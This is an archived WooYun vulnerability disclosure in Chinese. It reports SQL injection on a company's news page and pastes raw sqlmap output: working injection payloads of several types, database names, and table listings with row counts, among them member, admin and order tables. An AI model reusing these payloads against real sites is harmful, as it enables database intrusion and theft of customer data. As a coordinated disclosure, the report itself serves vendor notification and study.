乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-20: 细节已通知厂商并且等待厂商处理中 2015-12-23: 厂商已经确认,细节仅向厂商公开 2016-01-02: 细节向核心白帽子及相关领域专家公开 2016-01-12: 细节向普通白帽子公开 2016-01-22: 细节向实习白帽子公开 2016-02-04: 细节向公众公开
RT
注入点:http://**.**.**.**/newsDetail.php?id=5
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=5 AND 9903=9903 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=5 AND (SELECT 9990 FROM(SELECT COUNT(*),CONCAT(0x717a6a7171,(SELECT (ELT(9990=9990,1))),0x71716b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=5 AND (SELECT * FROM (SELECT(SLEEP(5)))poQO) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=5 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6a7171,0x68464f43715465596754,0x71716b6a71)-- ---back-end DBMS: MySQL 5.0current database: 'orichcom_main'current user is DBA: Falseavailable databases [3]:[*] information_schema[*] orichcom_buy[*] orichcom_main
Database: orichcom_main[8 tables]+------------+| banner || banner2 || lefttopad || lefttopad2 || link || marquee || news || search |+------------+
Database: orichcom_buy+---------------------------+---------+| Table | Entries |+---------------------------+---------+| rich_goods_extra | 20988 || conline | 11982 || rich_item_to_rlcategory | 9923 || rich_goods | 3503 || rich_relative_cty | 492 || rich_order_cart | 100 || rich_order_history | 79 || rich_goods_static | 52 || rich_members | 46 || rich_order | 43 || rich_order_addr | 43 || rich_member_extra | 36 || rich_order_man | 32 || rich_forgot_psw | 30 || rich_admin | 24 || rich_comdata | 24 || rich_admin_to_acl | 19 || rich_item | 19 || rich_goods_question | 14 || rich_goods_question_reply | 13 || rich_acl_rules | 7 || rich_category | 4 || rich_component_set | 4 || rich_serback_ui_filter | 4 || rich_order_return_info | 2 |+---------------------------+---------+
危害等级:高
漏洞Rank:16
确认时间:2015-12-23 04:03
感謝通報
暂无